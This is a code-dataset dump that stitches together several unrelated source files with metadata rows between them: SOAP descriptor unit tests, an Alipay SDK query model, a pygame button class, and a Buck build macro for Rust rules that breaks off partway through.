desc = SOAP(species=[1, 8], rcut=5, nmax=5, lmax=5, periodic=True, sparse=False)
vec = desc.create(H2O)
self.assertTrue(type(vec) == np.ndarray)
desc = SOAP(species=[1, 8], rcut=5, nmax=5, lmax=5, periodic=True, sparse=True)
vec = desc.create(H2O)
self.assertTrue(type(vec) == scipy.sparse.coo_matrix)
def test_positions(self):
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True,)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=False,)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=False,)
n_feat = desc.get_number_of_features()
self.assertEqual((1, n_feat), desc.create(H2O, positions=np.array([[0, 0, 0]])).shape)
self.assertEqual((1, n_feat), desc.create(H2O, positions=[[0, 0, 0]]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=[0, 1, 2]).shape)
self.assertEqual((3, n_feat), desc.create(H2O, positions=np.array([0, 1, 2])).shape)
self.assertEqual((3, n_feat), desc.create(H2O).shape)
with self.assertRaises(ValueError):
desc.create(H2O, positions=['a'])
def test_parallel_dense(self):
samples = [molecule("CO"), molecule("N2O")]
desc = SOAP(
species=[6, 7, 8],
rcut=5,
nmax=3,
lmax=3,
sigma=1,
periodic=False,
crossover=True,
average=False,
sparse=False,
)
n_features = desc.get_number_of_features()
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=1,
)
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = desc.create(samples[1], [0])
assumed[2, :] = desc.create(samples[1], [1])
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
)
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = desc.create(samples[1], [0])
assumed[2, :] = desc.create(samples[1], [1])
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[None, None],
n_jobs=2,
)
assumed = np.empty((2+3, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = desc.create(samples[0], [1])
assumed[2, :] = desc.create(samples[1], [0])
assumed[3, :] = desc.create(samples[1], [1])
assumed[4, :] = desc.create(samples[1], [2])
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[[[0, 0, 0], [1, 2, 0]], [[1, 2, 0]]],
n_jobs=2,
)
assumed = np.empty((2+1, n_features))
assumed[0, :] = desc.create(samples[0], [[0, 0, 0]])
assumed[1, :] = desc.create(samples[0], [[1, 2, 0]])
assumed[2, :] = desc.create(samples[1], [[1, 2, 0]])
self.assertTrue(np.allclose(output, assumed))
desc._average = True
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
)
assumed = np.empty((2, n_features))
assumed[0, :] = desc.create(samples[0], [0])
assumed[1, :] = 1/2*(desc.create(samples[1], [0]) + desc.create(samples[1], [1]))
self.assertTrue(np.allclose(output, assumed))
def test_parallel_sparse(self):
samples = [molecule("CO"), molecule("N2O")]
desc = SOAP(
species=[6, 7, 8],
rcut=5,
nmax=3,
lmax=3,
sigma=1,
periodic=False,
crossover=True,
average=False,
sparse=True,
)
n_features = desc.get_number_of_features()
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=1,
).toarray()
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = desc.create(samples[1], [0]).toarray()
assumed[2, :] = desc.create(samples[1], [1]).toarray()
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
).toarray()
assumed = np.empty((3, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = desc.create(samples[1], [0]).toarray()
assumed[2, :] = desc.create(samples[1], [1]).toarray()
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[None, None],
n_jobs=2,
).toarray()
assumed = np.empty((2+3, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = desc.create(samples[0], [1]).toarray()
assumed[2, :] = desc.create(samples[1], [0]).toarray()
assumed[3, :] = desc.create(samples[1], [1]).toarray()
assumed[4, :] = desc.create(samples[1], [2]).toarray()
self.assertTrue(np.allclose(output, assumed))
output = desc.create(
system=samples,
positions=[[[0, 0, 0], [1, 2, 0]], [[1, 2, 0]]],
n_jobs=2,
).toarray()
assumed = np.empty((2+1, n_features))
assumed[0, :] = desc.create(samples[0], [[0, 0, 0]]).toarray()
assumed[1, :] = desc.create(samples[0], [[1, 2, 0]]).toarray()
assumed[2, :] = desc.create(samples[1], [[1, 2, 0]]).toarray()
self.assertTrue(np.allclose(output, assumed))
desc._average = True
output = desc.create(
system=samples,
positions=[[0], [0, 1]],
n_jobs=2,
).toarray()
assumed = np.empty((2, n_features))
assumed[0, :] = desc.create(samples[0], [0]).toarray()
assumed[1, :] = 1/2*(desc.create(samples[1], [0]).toarray() + desc.create(samples[1], [1]).toarray())
self.assertTrue(np.allclose(output, assumed))
def test_unit_cells(self):
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
molecule = H2O.copy()
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
nocell = desc.create(molecule, positions=[[0, 0, 0]])
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True,)
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
with self.assertRaises(ValueError):
desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_pbc(True)
molecule.set_cell([
[20.0, 0.0, 0.0],
[0.0, 30.0, 0.0],
[0.0, 0.0, 40.0],
])
largecell = desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_cell([
[2.0, 0.0, 0.0],
[0.0, 2.0, 0.0],
[0.0, 0.0, 2.0]
])
cubic_cell = desc.create(molecule, positions=[[0, 0, 0]])
molecule.set_cell([
[0.0, 2.0, 2.0],
[2.0, 0.0, 2.0],
[2.0, 2.0, 0.0]
])
triclinic_smallcell = desc.create(molecule, positions=[[0, 0, 0]])
def test_is_periodic(self):
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True,)
H2O.set_pbc(False)
nocell = desc.create(H2O, positions=[[0, 0, 0]])
H2O.set_pbc(True)
H2O.set_cell([
[2.0, 0.0, 0.0],
[0.0, 2.0, 0.0],
[0.0, 0.0, 2.0]
])
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True)
cubic_cell = desc.create(H2O, positions=[[0, 0, 0]])
self.assertTrue(np.sum(cubic_cell) > 0)
def test_periodic_images(self):
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=False, crossover=True)
molecule = H2O.copy()
molecule.set_cell([
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]
])
nocell = desc.create(molecule, positions=[[0, 0, 0]])
desc = SOAP(species=[1, 6, 8], rcut=10.0, nmax=2, lmax=0, periodic=True, crossover=True)
molecule.set_pbc(True)
molecule.set_cell([
[3.0, 0.0, 0.0],
[0.0, 3.0, 0.0],
[0.0, 0.0, 3.0]
])
cubic_cell = desc.create(molecule, positions=[[0, 0, 0]])
suce = molecule * (2, 1, 1)
cubic_suce = desc.create(suce, positions=[[0, 0, 0]])
molecule.set_cell([
[0.0, 2.0, 2.0],
[2.0, 0.0, 2.0],
[2.0, 2.0, 0.0]
])
triclinic_cell = desc.create(molecule, positions=[[0, 0, 0]])
suce = molecule * (2, 1, 1)
triclinic_suce = desc.create(suce, positions=[[0, 0, 0]])
self.assertTrue(np.sum(np.abs((nocell[:3] - cubic_suce[:3]))) > 0.1)
self.assertAlmostEqual(np.sum(cubic_cell[:3] - cubic_suce[:3]), 0)
self.assertAlmostEqual(np.sum(triclinic_cell[:3] - triclinic_suce[:3]), 0)
def test_symmetries(self):
def create_gto(system):
desc = SOAP(
species=system.get_atomic_numbers(),
rcut=8.0,
lmax=5,
nmax=5,
rbf="gto",
periodic=False,
crossover=True
)
return desc.create(system)
self.assertTrue(self.is_rotationally_symmetric(create_gto))
self.assertTrue(self.is_translationally_symmetric(create_gto))
def create_poly(system):
desc = SOAP(
species=system.get_atomic_numbers(),
rcut=8.0,
lmax=2,
nmax=1,
rbf="polynomial",
periodic=False,
crossover=True
)
return desc.create(system)
self.assertTrue(self.is_rotationally_symmetric(create_poly))
self.assertTrue(self.is_translationally_symmetric(create_poly))
def test_average(self):
sys = Atoms(symbols=["H", "C"], positions=[[-1, 0, 0], [1, 0, 0]], cell=[2, 2, 2], pbc=True)
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
average=True,
sparse=False
)
average = desc.create(sys)[0, :]
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
average=False,
sparse=False
)
first = desc.create(sys, positions=[0])[0, :]
second = desc.create(sys, positions=[1])[0, :]
assumed_average = (first+second)/2
self.assertTrue(np.array_equal(average, assumed_average))
def test_basis(self):
sys1 = Atoms(symbols=["H", "H"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys2 = Atoms(symbols=["O", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys3 = Atoms(symbols=["C", "C"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys4 = Atoms(symbols=["H", "C"], positions=[[-1, 0, 0], [1, 0, 0]], cell=[2, 2, 2], pbc=True)
sys5 = Atoms(symbols=["H", "C"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys6 = Atoms(symbols=["H", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
sys7 = Atoms(symbols=["C", "O"], positions=[[1, 0, 0], [0, 1, 0]], cell=[2, 2, 2], pbc=True)
desc = SOAP(
species=[1, 6, 8],
rcut=5,
nmax=3,
lmax=5,
periodic=False,
crossover=True,
sparse=False
)
vec1 = desc.create(sys1, positions=[[0, 0, 0]])[0, :]
vec2 = desc.create(sys2, positions=[[0, 0, 0]])[0, :]
vec3 = desc.create(sys3, positions=[[0, 0, 0]])[0, :]
vec4 = desc.create(sys4, positions=[[0, 0, 0]])[0, :]
vec5 = desc.create(sys5, positions=[[0, 0, 0]])[0, :]
vec6 = desc.create(sys6, positions=[[0, 0, 0]])[0, :]
vec7 = desc.create(sys7, positions=[[0, 0, 0]])[0, :]
dot = np.dot(vec1, vec2)
self.assertEqual(dot, 0)
dot = np.dot(vec2, vec3)
self.assertEqual(dot, 0)
dot = np.dot(vec4, vec5)
self.assertNotEqual(dot, 0)
n_elem_feat = desc.get_number_of_element_features()
h_part1 = vec1[0:n_elem_feat]
h_part2 = vec2[0:n_elem_feat]
h_part4 = vec4[0:n_elem_feat]
self.assertNotEqual(np.sum(h_part1), 0)
self.assertEqual(np.sum(h_part2), 0)
self.assertNotEqual(np.sum(h_part4), 0)
hc_part1 = vec1[1*n_elem_feat:2*n_elem_feat]
hc_part4 = vec4[1*n_elem_feat:2*n_elem_feat]
co_part6 = vec6[4*n_elem_feat:5*n_elem_feat]
co_part7 = vec7[4*n_elem_feat:5*n_elem_feat]
self.assertEqual(np.sum(hc_part1), 0)
self.assertNotEqual(np.sum(hc_part4), 0)
self.assertEqual(np.sum(co_part6), 0)
self.assertNotEqual(np.sum(co_part7), 0)
def test_rbf_orthonormality(self):
sigma = 0.15
rcut = 2.0
nmax = 2
lmax = 3
soap = SOAP(species=[1], lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, crossover=True, sparse=False)
alphas = np.reshape(soap._alphas, [10, nmax])
betas = np.reshape(soap._betas, [10, nmax, nmax])
nr = 10000
n_basis = 0
functions = np.zeros((nmax, lmax+1, nr))
for n in range(nmax):
for l in range(lmax+1):
gto = np.zeros((nr))
rspace = np.linspace(0, rcut+5, nr)
for k in range(nmax):
gto += betas[l, n, k]*rspace**l*np.exp(-alphas[l, k]*rspace**2)
n_basis += 1
functions[n, l, :] = gto
S = np.zeros((nmax, nmax))
l = 0
for l in range(lmax+1):
for i in range(nmax):
for j in range(nmax):
overlap = np.trapz(rspace**2*functions[i, l, :]*functions[j, l, :], dx=(rcut+5)/nr)
S[i, j] = overlap
diff = S-np.eye(nmax)
self.assertTrue(np.allclose(diff, np.zeros((nmax, nmax)), atol=1e-3))
def test_gto_integration(self):
sigma = 0.55
rcut = 2.0
nmax = 2
lmax = 2
r1 = 0.
r2 = rcut+5
t1 = 0
t2 = np.pi
p1 = 0
p2 = 2*np.pi
positions = np.array([[0.0, 0.0, 0.0], [-0.3, 0.5, 0.4]])
symbols = np.array(["H", "C"])
system = Atoms(positions=positions, symbols=symbols)
species = system.get_atomic_numbers()
elements = set(system.get_atomic_numbers())
n_elems = len(elements)
soap = SOAP(species=species, lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, crossover=True, sparse=False)
analytical_power_spectrum = soap.create(system, positions=[[0, 0, 0]])[0]
alphagrid = np.reshape(soap._alphas, [10, nmax])
betagrid = np.reshape(soap._betas, [10, nmax, nmax])
coeffs = np.zeros((n_elems, nmax, lmax+1, 2*lmax+1))
for iZ, Z in enumerate(elements):
indices = np.argwhere(species == Z)[0]
elem_pos = positions[indices]
for n in range(nmax):
for l in range(lmax+1):
for im, m in enumerate(range(-l, l+1)):
def soap_coeff(phi, theta, r):
ylm_comp = scipy.special.sph_harm(np.abs(m), l, phi, theta)
ylm_real = np.real(ylm_comp)
ylm_imag = np.imag(ylm_comp)
if m < 0:
ylm = np.sqrt(2)*(-1)**m*ylm_imag
elif m == 0:
ylm = ylm_comp
else:
ylm = np.sqrt(2)*(-1)**m*ylm_real
gto = 0
for i in range(nmax):
i_alpha = alphagrid[l, i]
i_beta = betagrid[l, n, i]
i_gto = i_beta*r**l*np.exp(-i_alpha*r**2)
gto += i_gto
rho = 0
for i_pos in elem_pos:
ix = i_pos[0]
iy = i_pos[1]
iz = i_pos[2]
ri_squared = ix**2+iy**2+iz**2
rho += np.exp(-1/(2*sigma**2)*(r**2 + ri_squared - 2*r*(np.sin(theta)*np.cos(phi)*ix + np.sin(theta)*np.sin(phi)*iy + np.cos(theta)*iz)))
jacobian = np.sin(theta)*r**2
return gto*ylm*rho*jacobian
cnlm = tplquad(
soap_coeff,
r1,
r2,
lambda r: t1,
lambda r: t2,
lambda r, theta: p1,
lambda r, theta: p2,
epsabs=0.001,
epsrel=0.001,
)
integral, error = cnlm
coeffs[iZ, n, l, im] = integral
numerical_power_spectrum = []
for zi in range(n_elems):
for zj in range(n_elems):
for l in range(lmax+1):
for ni in range(nmax):
for nj in range(nmax):
if nj >= ni:
if zj >= zi:
value = np.dot(coeffs[zi, ni, l, :], coeffs[zj, nj, l, :])
prefactor = np.pi*np.sqrt(8/(2*l+1))
value *= prefactor
numerical_power_spectrum.append(value)
self.assertTrue(np.allclose(numerical_power_spectrum, analytical_power_spectrum, atol=1e-15, rtol=0.01))
def test_poly_integration(self):
sigma = 0.55
rcut = 2.0
nmax = 2
lmax = 2
r1 = 0.
r2 = rcut+5
t1 = 0
t2 = np.pi
p1 = 0
p2 = 2*np.pi
positions = np.array([[0.0, 0.0, 0.0], [-0.3, 0.5, 0.4]])
symbols = np.array(["H", "C"])
system = Atoms(positions=positions, symbols=symbols)
species = system.get_atomic_numbers()
elements = set(system.get_atomic_numbers())
n_elems = len(elements)
S = np.zeros((nmax, nmax))
for i in range(1, nmax+1):
for j in range(1, nmax+1):
S[i-1, j-1] = (2*(rcut)**(7+i+j))/((5+i+j)*(6+i+j)*(7+i+j))
betas = sqrtm(np.linalg.inv(S))
soap = SOAP(species=species, lmax=lmax, nmax=nmax, sigma=sigma, rcut=rcut, rbf="polynomial", crossover=True, sparse=False)
analytical_power_spectrum = soap.create(system, positions=[[0, 0, 0]])[0]
coeffs = np.zeros((n_elems, nmax, lmax+1, 2*lmax+1))
for iZ, Z in enumerate(elements):
indices = np.argwhere(species == Z)[0]
elem_pos = positions[indices]
for n in range(nmax):
for l in range(lmax+1):
for im, m in enumerate(range(-l, l+1)):
def soap_coeff(phi, theta, r):
ylm_comp = scipy.special.sph_harm(np.abs(m), l, phi, theta)
ylm_real = np.real(ylm_comp)
ylm_imag = np.imag(ylm_comp)
if m < 0:
ylm = np.sqrt(2)*(-1)**m*ylm_imag
elif m == 0:
ylm = ylm_comp
else:
ylm = np.sqrt(2)*(-1)**m*ylm_real
poly = 0
for k in range(1, nmax+1):
poly += betas[n, k-1]*(rcut-np.clip(r, 0, rcut))**(k+2)
rho = 0
for i_pos in elem_pos:
ix = i_pos[0]
iy = i_pos[1]
iz = i_pos[2]
ri_squared = ix**2+iy**2+iz**2
rho += np.exp(-1/(2*sigma**2)*(r**2 + ri_squared - 2*r*(np.sin(theta)*np.cos(phi)*ix + np.sin(theta)*np.sin(phi)*iy + np.cos(theta)*iz)))
jacobian = np.sin(theta)*r**2
return poly*ylm*rho*jacobian
cnlm = tplquad(
soap_coeff,
r1,
r2,
lambda r: t1,
lambda r: t2,
lambda r, theta: p1,
lambda r, theta: p2,
epsabs=0.0001,
epsrel=0.0001,
)
integral, error = cnlm
coeffs[iZ, n, l, im] = integral
numerical_power_spectrum = []
for zi in range(n_elems):
for zj in range(n_elems):
for l in range(lmax+1):
for ni in range(nmax):
for nj in range(nmax):
if nj >= ni and zj >= zi:
value = np.dot(coeffs[zi, ni, l, :], coeffs[zj, nj, l, :])
prefactor = np.pi*np.sqrt(8/(2*l+1))
value *= prefactor
numerical_power_spectrum.append(value)
self.assertTrue(np.allclose(numerical_power_spectrum, analytical_power_spectrum, atol=1e-15, rtol=0.01))
def test_padding(self):
np.random.seed(7)
for ncells in range(1, 6):
ncells = int(ncells)
for rcut in np.linspace(2, 10, 11):
for sigma in np.linspace(0.5, 2, 4):
soap_generator = SOAP(
rcut=rcut, nmax=4, lmax=4, sigma=sigma, species=["Ni", "Ti"], periodic=True
)
a = 2.993
niti = Atoms(
"NiTi",
positions=[[0.0, 0.0, 0.0], [a / 2, a / 2, a / 2]],
cell=[a, a, a],
pbc=[1, 1, 1],
)
niti = niti * ncells
a *= ncells
positions = niti.get_positions()
noise = np.random.normal(scale=0.5, size=positions.shape)
niti.set_positions(positions + noise)
niti.wrap()
orthogonal_soaps = soap_generator.create(niti)
niti.set_cell([[a, 0, 0], [0, a, 0], [a, 0, a]])
niti.wrap()
non_orthogonal_soaps = soap_generator.create(niti)
self.assertTrue(np.allclose(orthogonal_soaps, non_orthogonal_soaps, atol=1e-8, rtol=1e-2))
if __name__ == '__main__':
suites = []
suites.append(unittest.TestLoader().loadTestsFromTestCase(SoapTests))
alltests = unittest.TestSuite(suites)
result = unittest.TextTestRunner(verbosity=0).run(alltests)
| true | true |
1c3c75123408af126c5c4039ef3cbcdf9d6476cc | 1,830 | py | Python | alipay/aop/api/domain/KoubeiRetailExtitemShopextitemQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 213 | 2018-08-27T16:49:32.000Z | 2021-12-29T04:34:12.000Z | alipay/aop/api/domain/KoubeiRetailExtitemShopextitemQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 29 | 2018-09-29T06:43:00.000Z | 2021-09-02T03:27:32.000Z | alipay/aop/api/domain/KoubeiRetailExtitemShopextitemQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 59 | 2018-08-27T16:59:26.000Z | 2022-03-25T10:08:15.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiRetailExtitemShopextitemQueryModel(object):
def __init__(self):
self._page_no = None
self._page_size = None
self._shop_id = None
@property
def page_no(self):
return self._page_no
@page_no.setter
def page_no(self, value):
self._page_no = value
@property
def page_size(self):
return self._page_size
@page_size.setter
def page_size(self, value):
self._page_size = value
@property
def shop_id(self):
return self._shop_id
@shop_id.setter
def shop_id(self, value):
self._shop_id = value
def to_alipay_dict(self):
params = dict()
if self.page_no:
if hasattr(self.page_no, 'to_alipay_dict'):
params['page_no'] = self.page_no.to_alipay_dict()
else:
params['page_no'] = self.page_no
if self.page_size:
if hasattr(self.page_size, 'to_alipay_dict'):
params['page_size'] = self.page_size.to_alipay_dict()
else:
params['page_size'] = self.page_size
if self.shop_id:
if hasattr(self.shop_id, 'to_alipay_dict'):
params['shop_id'] = self.shop_id.to_alipay_dict()
else:
params['shop_id'] = self.shop_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiRetailExtitemShopextitemQueryModel()
if 'page_no' in d:
o.page_no = d['page_no']
if 'page_size' in d:
o.page_size = d['page_size']
if 'shop_id' in d:
o.shop_id = d['shop_id']
return o
| 25.774648 | 69 | 0.574863 |
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiRetailExtitemShopextitemQueryModel(object):
def __init__(self):
self._page_no = None
self._page_size = None
self._shop_id = None
@property
def page_no(self):
return self._page_no
@page_no.setter
def page_no(self, value):
self._page_no = value
@property
def page_size(self):
return self._page_size
@page_size.setter
def page_size(self, value):
self._page_size = value
@property
def shop_id(self):
return self._shop_id
@shop_id.setter
def shop_id(self, value):
self._shop_id = value
def to_alipay_dict(self):
params = dict()
if self.page_no:
if hasattr(self.page_no, 'to_alipay_dict'):
params['page_no'] = self.page_no.to_alipay_dict()
else:
params['page_no'] = self.page_no
if self.page_size:
if hasattr(self.page_size, 'to_alipay_dict'):
params['page_size'] = self.page_size.to_alipay_dict()
else:
params['page_size'] = self.page_size
if self.shop_id:
if hasattr(self.shop_id, 'to_alipay_dict'):
params['shop_id'] = self.shop_id.to_alipay_dict()
else:
params['shop_id'] = self.shop_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiRetailExtitemShopextitemQueryModel()
if 'page_no' in d:
o.page_no = d['page_no']
if 'page_size' in d:
o.page_size = d['page_size']
if 'shop_id' in d:
o.shop_id = d['shop_id']
return o
| true | true |
1c3c763ba462e94efda486c16f0267e00a7c6a54 | 1,915 | py | Python | components/ui/button/index.py | wonknu/head_shot_adfab | 7e85c483ef3d4c8044e24f0132c0a2b700108d29 | [
"MIT"
] | null | null | null | components/ui/button/index.py | wonknu/head_shot_adfab | 7e85c483ef3d4c8044e24f0132c0a2b700108d29 | [
"MIT"
] | null | null | null | components/ui/button/index.py | wonknu/head_shot_adfab | 7e85c483ef3d4c8044e24f0132c0a2b700108d29 | [
"MIT"
] | null | null | null | # -*- coding: cp1252 -*-
#/usr/bin/env python
#Simon H. Larsen
#Buttons
#Project startet: d. 26. august 2012
import pygame
from pygame.locals import *
pygame.init()
class Button:
def create_button(self, surface, color, x, y, length, height, width, text, text_color):
surface = self.draw_button(surface, color, length, height, x, y, width)
surface = self.write_text(surface, text, text_color, length, height, x, y)
self.rect = pygame.Rect(x,y, length, height)
return surface
def write_text(self, surface, text, text_color, length, height, x, y):
font_size = int(length//len(text))
myFont = pygame.font.SysFont("Calibri", font_size)
myText = myFont.render(text, 1, text_color)
surface.blit(myText, ((x+length/2) - myText.get_width()/2, (y+height/2) - myText.get_height()/2))
return surface
def draw_button(self, surface, color, length, height, x, y, width):
for i in range(1,10):
s = pygame.Surface((length+(i*2),height+(i*2)))
s.fill(color)
alpha = (255/(i+2))
if alpha <= 0:
alpha = 1
s.set_alpha(alpha)
pygame.draw.rect(s, color, (x-i,y-i,length+i,height+i), width)
surface.blit(s, (x-i,y-i))
pygame.draw.rect(surface, color, (x,y,length,height), 0)
pygame.draw.rect(surface, (190,190,190), (x,y,length,height), 1)
return surface
def pressed(self, mouse):
if mouse[0] > self.rect.topleft[0]:
if mouse[1] > self.rect.topleft[1]:
if mouse[0] < self.rect.bottomright[0]:
if mouse[1] < self.rect.bottomright[1]:
return True
else: return False
else: return False
else: return False
else: return False
| 40.744681 | 106 | 0.557702 |
import pygame
from pygame.locals import *
pygame.init()
class Button:
def create_button(self, surface, color, x, y, length, height, width, text, text_color):
surface = self.draw_button(surface, color, length, height, x, y, width)
surface = self.write_text(surface, text, text_color, length, height, x, y)
self.rect = pygame.Rect(x,y, length, height)
return surface
def write_text(self, surface, text, text_color, length, height, x, y):
font_size = int(length//len(text))
myFont = pygame.font.SysFont("Calibri", font_size)
myText = myFont.render(text, 1, text_color)
surface.blit(myText, ((x+length/2) - myText.get_width()/2, (y+height/2) - myText.get_height()/2))
return surface
def draw_button(self, surface, color, length, height, x, y, width):
for i in range(1,10):
s = pygame.Surface((length+(i*2),height+(i*2)))
s.fill(color)
alpha = (255/(i+2))
if alpha <= 0:
alpha = 1
s.set_alpha(alpha)
pygame.draw.rect(s, color, (x-i,y-i,length+i,height+i), width)
surface.blit(s, (x-i,y-i))
pygame.draw.rect(surface, color, (x,y,length,height), 0)
pygame.draw.rect(surface, (190,190,190), (x,y,length,height), 1)
return surface
def pressed(self, mouse):
if mouse[0] > self.rect.topleft[0]:
if mouse[1] > self.rect.topleft[1]:
if mouse[0] < self.rect.bottomright[0]:
if mouse[1] < self.rect.bottomright[1]:
return True
else: return False
else: return False
else: return False
else: return False
| true | true |
1c3c76482a0cb9666264509e6b327cac252b25de | 14,353 | py | Python | infra_macros/macro_lib/convert/rust.py | martarozek/buckit | 343cc5a5964c1d43902b6a77868652adaefa0caa | [
"BSD-3-Clause"
] | null | null | null | infra_macros/macro_lib/convert/rust.py | martarozek/buckit | 343cc5a5964c1d43902b6a77868652adaefa0caa | [
"BSD-3-Clause"
] | null | null | null | infra_macros/macro_lib/convert/rust.py | martarozek/buckit | 343cc5a5964c1d43902b6a77868652adaefa0caa | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python2
# Copyright 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import pipes
import os.path
macro_root = read_config('fbcode', 'macro_lib', '//macro_lib')
include_defs("{}/convert/base.py".format(macro_root), "base")
include_defs("{}/rule.py".format(macro_root))
include_defs("{}/fbcode_target.py".format(macro_root), "target")
load("{}:fbcode_target.py".format(macro_root),
"RootRuleTarget",
"RuleTarget",
"ThirdPartyRuleTarget")
load("@fbcode_macros//build_defs:platform_utils.bzl", "platform_utils")
class RustConverter(base.Converter):
def __init__(self, context, rule_type):
super(RustConverter, self).__init__(context)
self._rule_type = rule_type
def get_fbconfig_rule_type(self):
return self._rule_type
def get_buck_rule_type(self):
if self._rule_type == 'rust_unittest':
return 'rust_test'
else:
return self._rule_type
def is_binary(self):
return self.get_fbconfig_rule_type() in \
('rust_binary', 'rust_unittest',)
def is_test(self):
return self.get_fbconfig_rule_type() in ('rust_unittest',)
def is_deployable(self):
return self.is_binary()
def get_allowed_args(self):
# common
ok = set([
'name',
'srcs',
'deps',
'external_deps',
'features',
'rustc_flags',
'crate',
'crate_root',
])
# non-tests
if not self.is_test():
ok |= set([
'unittests',
'tests',
'test_deps',
'test_external_deps',
'test_srcs',
'test_features',
'test_rustc_flags',
'test_link_style',
])
else:
ok.update(['framework'])
# linkable
if self.is_binary():
ok |= set(['linker_flags', 'link_style', 'allocator'])
else:
ok |= set(['preferred_linkage', 'proc_macro'])
return ok
def get_rust_binary_deps(self, base_path, name, linker_flags, allocator):
deps = []
rules = []
allocator = self.get_allocator(allocator)
d, r = self.get_binary_link_deps(
base_path,
name,
linker_flags,
allocator,
)
deps.extend(d)
rules.extend(r)
# Always explicitly add libc - except for sanitizer modes, since
# they already add them
libc = ThirdPartyRuleTarget('glibc', 'c')
if libc not in deps:
deps.append(libc)
# Always explicitly add libstdc++ - except for sanitizer modes, since
